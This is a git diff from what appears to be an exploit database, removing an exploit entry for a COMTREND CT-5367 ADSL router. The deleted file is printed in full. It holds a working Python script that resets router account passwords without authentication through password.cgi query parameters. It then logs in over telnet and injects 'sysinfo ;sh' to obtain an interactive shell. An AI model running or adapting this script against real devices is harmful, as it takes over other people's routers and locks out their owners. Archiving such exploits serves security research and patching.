From 26a51e465709aa523123b948e0c82f9999cfcdb1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 31 Dec 2017 05:02:21 +0000 Subject: [PATCH] DB: 2017-12-31 2 changes to exploits/shellcodes COMTREND ADSL Router CT-5367 - Remote Code Execution --- exploits/hardware/remote/43389.py | 124 ------------------------------ files_exploits.csv | 1 - 2 files changed, 125 deletions(-) delete mode 100755 exploits/hardware/remote/43389.py diff --git a/exploits/hardware/remote/43389.py b/exploits/hardware/remote/43389.py deleted file mode 100755 index 90c491d6c..000000000 --- a/exploits/hardware/remote/43389.py +++ /dev/null @@ -1,124 +0,0 @@ -# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute -# Date: 11-12-2017 -# Exploit Author: TnMch -# Software Link : null -# Type : HardWare -# Risk of use : High -# Type to use : Remote - - -1. Description - -Any user can edit all users password and execute remote code directly without have access - -2. Proof of Concept - -request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi - -
- - - - - - - - - - - - - - - - - -
Username:
Old Password:
New Password:
Confirm Password:
-
-
-
- - -3 .exploit - - -#!/usr/bin/env python -import platform -import requests -import base64 - -url = "http://192.168.1.1/" - -''' first check default gateway ''' - -r = requests.get(url,allow_redirects=True) -resp = r.content - -'''Check resp''' - -if 'Authorization' not in resp: - exit("[-]Invalid host !! ") - -''' Change password ''' - -again = True - -while again: - print "Which User" - print "(root | support | user )" - user = raw_input('user : ').split()[0] - - if user not in ("root","support","user"): - exit("[-] No user with this name !! ") - - print "[+] Update password ",user - password = raw_input('new password : ').split()[0] - print "[+] Update new password ['",password,"']" - - if user == "root": - url +="password.cgi?sysPassword="+password - if user == "support": - url +="password.cgi?sptPassword="+password - if user == "user": - url +="password.cgi?usrPassword="+password - - pass_b64 = password.encode('base64').split()[0] - - r2 = requests.get(url,allow_redirects=True) - resp2 = r2.content - - ''' Check update ''' - - if pass_b64 in resp2: - print "[+] Password for user : ",user," updated!" - print "Happy hacking :D, enjoy" - else: - print "[-] Something Wrong , please check again! " - - y_n = raw_input('Do you want again? :D (y/n) : ').split()[0] - - if 'n'!= y_n and 'y' != y_n: - exit('bad input :(') - if y_n == 'n': - print "Go Go Go :D ,No Time for you Mr.Robot" - shell_yn= raw_input("Do you want shell? (y/n) :D : ").split()[0] - if shell_yn !='n': - sys = platform.system() - if sys =="Windows": - exit("Sorry only on Linux or Mac Os") - from pwn import * - target = "192.168.1.1" - port = 23 - p = remote(target,port) - p.recvuntil("Login:") - p.sendline(user) - p.recvuntil("Password:") - p.sendline(password) - p.sendline("sysinfo ;sh") - p.interactive() - again = False \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6c2172ab5..637bff09f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -15873,7 +15873,6 @@ id,file,description,date,author,type,platform,port
 43386,exploits/linux/remote/43386.py,"Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access",2016-01-09,operator8203,remote,linux,
 43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413
 43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple,
-43389,exploits/hardware/remote/43389.py,"COMTREND ADSL Router CT-5367 - Remote Code Execution",2017-12-26,TnMch,remote,hardware,
 43407,exploits/windows/remote/43407.rb,"ALLMediaServer 0.95 - Buffer Overflow (Metasploit)",2017-12-28,"Anurag Srivastava",remote,windows,
 43408,exploits/windows/remote/43408.py,"NetTransport 2.96L - Buffer Overflow (DEP Bypass)",2017-12-29,"Aloyce J. Makalanga",remote,windows,
 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,